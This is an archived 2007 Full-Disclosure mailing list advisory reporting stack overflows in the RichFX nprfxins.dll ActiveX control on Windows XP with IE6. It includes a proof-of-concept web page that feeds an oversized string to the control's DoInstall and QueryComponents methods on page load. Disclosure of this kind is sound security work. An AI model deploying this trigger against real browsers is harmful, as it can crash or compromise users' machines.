[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] RichFX nprfxins.dll ActiveX Control Multiple Stack Overflows
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] RichFX nprfxins.dll ActiveX Control Multiple Stack Overflows
- From: Elazar Broad <elazarb@xxxxxxxxxxxxx>
- Date: Sun, 25 Nov 2007 17:42:28 -0500 (GMT-05:00)
There are multiple stack overflows in the RichFX nprfxins.dll ActiveX Control.
I almost positive that this control was installed with RealNetworks RealPlayer.
This was tested on Windows XP SP2 fully patched and IE6. This control is marked
safe for scripting. I have not tested code execution. PoC as follows:
------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr");
//{47F59200-8783-11D2-8343-00A0C945A819}
obj.DoInstall(s);
obj.QueryComponents(s);
}
</script>
</head>
<body onload="JavaScript: return Check();">
</body>
</html>
------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/